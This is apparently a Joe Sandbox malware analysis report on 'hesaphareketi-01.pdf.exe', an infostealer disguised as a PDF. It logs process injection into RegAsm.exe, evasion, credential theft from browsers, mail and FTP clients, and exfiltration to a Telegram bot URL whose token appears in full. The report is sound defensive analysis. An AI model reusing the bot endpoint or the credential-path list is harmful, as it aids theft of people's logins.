                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 597984
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 597875
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 597765
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 597656
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 597547
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 597422
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 597312
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 597203
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 597093
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 596967
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 596859
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 596750
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 596639
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 596510
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 596310
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 596078
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 595652
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 595547
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 595437
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 595328
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 595219
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 595094
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 594984
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 594875
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 594765
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 594656
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 594547
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 594437
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 594328
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 594218
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 594109
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 594000
                        Source: RegAsm.exe, 00000003.00000002.3679376567.0000000005AF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information queried: ProcessInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process token adjusted: Debug
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe | Code function: 0_2_00007FF7341D55C0 RtlAddVectoredExceptionHandler,0_2_00007FF7341D55C0
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe | Code function: 0_2_00007FF734239808 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF734239808
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43E000
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 69E008
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe | Code function: 0_2_00007FF7341D5270 cpuid 0_2_00007FF7341D5270
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe | Code function: 0_2_00007FF7341DDD30 GetSystemTimeAsFileTime,0_2_00007FF7341DDD30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Stealing of Sensitive Information

                        Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                        Source: Yara match | File source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000003.00000002.3677180762.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: hesaphareketi-01.pdf.exe PID: 6992, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6596, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\FTP Navigator\Ftplist.txt
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

                        Remote Access Functionality

                        Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                        Source: Yara match | File source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000003.00000002.3677180762.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: hesaphareketi-01.pdf.exe PID: 6992, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6596, type: MEMORYSTR
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                        Windows Management Instrumentation
                        1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        1
                        Disable or Modify Tools
                        2
                        OS Credential Dumping
                        1
                        System Time Discovery
                        Remote Services11
                        Archive Collected Data
                        1
                        Web Service
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                        Access Token Manipulation
                        11
                        Deobfuscate/Decode Files or Information
                        21
                        Input Capture
                        1
                        File and Directory Discovery
                        Remote Desktop Protocol2
                        Data from Local System
                        1
                        Ingress Tool Transfer
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
                        Process Injection
                        12
                        Obfuscated Files or Information
                        1
                        Credentials in Registry
                        36
                        System Information Discovery
                        SMB/Windows Admin Shares1
                        Email Collection
                        11
                        Encrypted Channel
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                        Software Packing
                        NTDS111
                        Security Software Discovery
                        Distributed Component Object Model21
                        Input Capture
                        3
                        Non-Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading
                        LSA Secrets1
                        Process Discovery
                        SSH1
                        Clipboard Data
                        14
                        Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Masquerading
                        Cached Domain Credentials141
                        Virtualization/Sandbox Evasion
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                        Virtualization/Sandbox Evasion
                        DCSync1
                        Application Window Discovery
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Access Token Manipulation
                        Proc Filesystem1
                        System Network Configuration Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt311
                        Process Injection
                        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        Antivirus detection for the submitted file:
                        Source: hesaphareketi-01.pdf.exe | Detection: 34% | Scanner: ReversingLabs | Label: Win64.Trojan.GenSteal
                        Source: hesaphareketi-01.pdf.exe | Detection: 39% | Scanner: Virustotal
                        No Antivirus matches
                        Antivirus detection for contacted URLs:
                        Source: https://api.ipify.org/ | Detection: 0% | Scanner: URL Reputation | Label: safe
                        Source: https://api.ipify.org | Detection: 0% | Scanner: URL Reputation | Label: safe
                        Source: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid | Detection: 0% | Scanner: URL Reputation | Label: safe
                        Source: https://account.dyn.com/ | Detection: 0% | Scanner: URL Reputation | Label: safe
                        Source: https://aka.ms/dotnet-warnings/ | Detection: 0% | Scanner: URL Reputation | Label: safe
                        Source: https://api.telegram | Detection: 0% | Scanner: URL Reputation | Label: safe
                        Source: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Detection: 0% | Scanner: URL Reputation | Label: safe
                        Source: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY | Detection: 0% | Scanner: Avira URL Cloud | Label: safe
                        Source: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidX | Detection: 0% | Scanner: Avira URL Cloud | Label: safe
                        Source: https://api.telegram.org/bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument | Detection: 0% | Scanner: Avira URL Cloud | Label: safe
                        Source: https://api.telegram.org | Detection: 0% | Scanner: Avira URL Cloud | Label: safe
                        Source: https://api.telegram.org/bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/ | Detection: 0% | Scanner: Avira URL Cloud | Label: safe
                        Source: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameX | Detection: 0% | Scanner: Avira URL Cloud | Label: safe
                        Source: https://api.telegram.orgx | Detection: 0% | Scanner: Avira URL Cloud | Label: safe
                        Source: http://api.telegram.org | Detection: 0% | Scanner: Avira URL Cloud | Label: safe
                        Contacted domains:
                        Name: api.ipify.org | IP: 104.26.13.205 | Active: true | Malicious: false | Antivirus Detection: none | Reputation: unknown
                        Name: api.telegram.org | IP: 149.154.167.220 | Active: true | Malicious: true | Antivirus Detection: none | Reputation: unknown
                        Contacted URLs:
                        Name: https://api.ipify.org/ | Malicious: false | Antivirus Detection: URL Reputation: safe | Reputation: unknown
                        Name: https://api.telegram.org/bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument | Malicious: true | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
                        URLs from memory and binaries:
                        Name: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidX | Source: hesaphareketi-01.pdf.exe, 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp | Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
                        Name: https://api.telegram.org/bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/ | Source: hesaphareketi-01.pdf.exe, 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002851000.00000004.00000800.00020000.00000000.sdmp | Malicious: true | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
                        Name: https://api.ipify.org | Source: hesaphareketi-01.pdf.exe, 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002851000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Antivirus Detection: URL Reputation: safe | Reputation: unknown
                        Name: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY | Source: hesaphareketi-01.pdf.exe | Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
                        Name: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid | Source: hesaphareketi-01.pdf.exe | Malicious: false | Antivirus Detection: URL Reputation: safe | Reputation: unknown
                        Name: https://account.dyn.com/ | Source: hesaphareketi-01.pdf.exe, 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Malicious: false | Antivirus Detection: URL Reputation: safe | Reputation: unknown
                        Name: https://aka.ms/dotnet-warnings/ | Source: hesaphareketi-01.pdf.exe | Malicious: false | Antivirus Detection: URL Reputation: safe | Reputation: unknown
                        Name: https://api.telegram.org | Source: RegAsm.exe, 00000003.00000002.3677180762.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.00000000028D8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002981000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.000000000289A000.00000004.00000800.00020000.00000000.sdmp | Malicious: true | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
                        Name: https://api.telegram.orgx | Source: RegAsm.exe, 00000003.00000002.3677180762.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
                        Name: https://api.telegram | Source: RegAsm.exe, 00000003.00000002.3677180762.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp | Malicious: true | Antivirus Detection: URL Reputation: safe | Reputation: unknown
                        Name: http://api.telegram.org | Source: RegAsm.exe, 00000003.00000002.3677180762.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
                        Name: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Source: hesaphareketi-01.pdf.exe | Malicious: false | Antivirus Detection: URL Reputation: safe | Reputation: unknown
                        Name: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameX | Source: hesaphareketi-01.pdf.exe, 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp | Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
104.26.13.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1446992
Start date and time: 2024-05-24 07:40:31 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 19s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: hesaphareketi-01.pdf.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@4/0@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 69%
• Number of executed functions: 96
• Number of non-executed functions: 53
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
01:41:25 | API Interceptor | 10662819x Sleep call for process: RegAsm.exe modified
                                                No created / dropped files found
File type: PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit): 7.009149672773074
TrID:
• Win64 Executable Console (202006/5) 92.65%
• Win64 Executable (generic) (12005/4) 5.51%
• Generic Win/DOS Executable (2004/3) 0.92%
• DOS Executable Generic (2002/1) 0.92%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: hesaphareketi-01.pdf.exe
File size: 2'066'432 bytes
MD5: 8f184daf4d3d0fac93db93c798e616ed
SHA1: f8c6c99b7e0572347ed1bee3ddb425e31f6cb643
SHA256: 97fa9df0ae7536db7c2427ff65ba51db3bbd22ebe957bf406ebe3f4ba4a46f7f
SHA512: 652d87c3ce83e960f3aa0edc2b16d8003b8b8a52d6025afb2818303b2d92ea4d123f3269249b751dff3d421ba46f9460d0d3c48be826808bfe4eaae9be21cd3e
SSDEEP: 24576:8ynjN3fi9dEoZR814OEQjls30eTFxmT4i8eMOq52AOXuq01dKqOFFSyF8FaE:9jN3CdJ81nEQhs30eouqsrOFXOaE
TLSH: 52A5B005A3F801E4E46BC634CA599733D3B1B41A1730E58B0A5AD7922F73EE15BBF612
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6c.IW._IW._IW._O..^EW._O..^XW._O..^gW._@/._GW._./.^BW._IW._IV._.+.^BW._.+.^.W._IW._KW._#..^HW._#.._HW._#..^HW._RichIW._.......
Icon Hash: 00928e8e8686b000
Entrypoint: 0x140068d5c
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x140000000
Subsystem: windows cui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x664E7376 [Wed May 22 22:36:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 79856d4b034c49dc3dd3e403b25b6bbf
                                                Programming Language:
                                                • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x1f79a0 | 0x58 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1f79f8 | 0xf0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x21d000 | 0x3b150 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x208000 | 0x1314c | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x259000 | 0x634 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1ca370 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x1ca500 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1ca230 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x17d000 | 0x778 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x71a88 | 0x71c00 | 5cdd54da137ec06542526019b1031732 | False | 0.4528288118131868 | data | 6.6410813091638 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.managed | 0x73000 | 0xb9168 | 0xb9200 | 2d30634d2eb96982ab12a2d431b95020 | False | 0.4601620526671168 | data | 6.463570386679756 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
hydrated | 0x12d000 | 0x4f808 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x17d000 | 0x7c4de | 0x7c600 | f3ba60da94e9809a9aa5de6dd815cada | False | 0.469921875 | data | 6.575390299832166 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x1fa000 | 0xdc90 | 0x2200 | 5c15d417ed4d359d82911c50efdabf9a | False | 0.23793658088235295 | data | 3.6721787513471362 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x208000 | 0x1314c | 0x13200 | 8cc774a948808419be7ca4f4b39fb78d | False | 0.4887280433006536 | data | 6.17164551981099 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA | 0x21c000 | 0x1f4 | 0x200 | cfc28b4453f40f4f91f4a52e36529a97 | False | 0.5078125 | data | 4.172727899540164 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x21d000 | 0x3b150 | 0x3b200 | bbfbc02d9cc634be31885274c1e9d08c | False | 0.9963167283298098 | data | 7.997686186749214 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
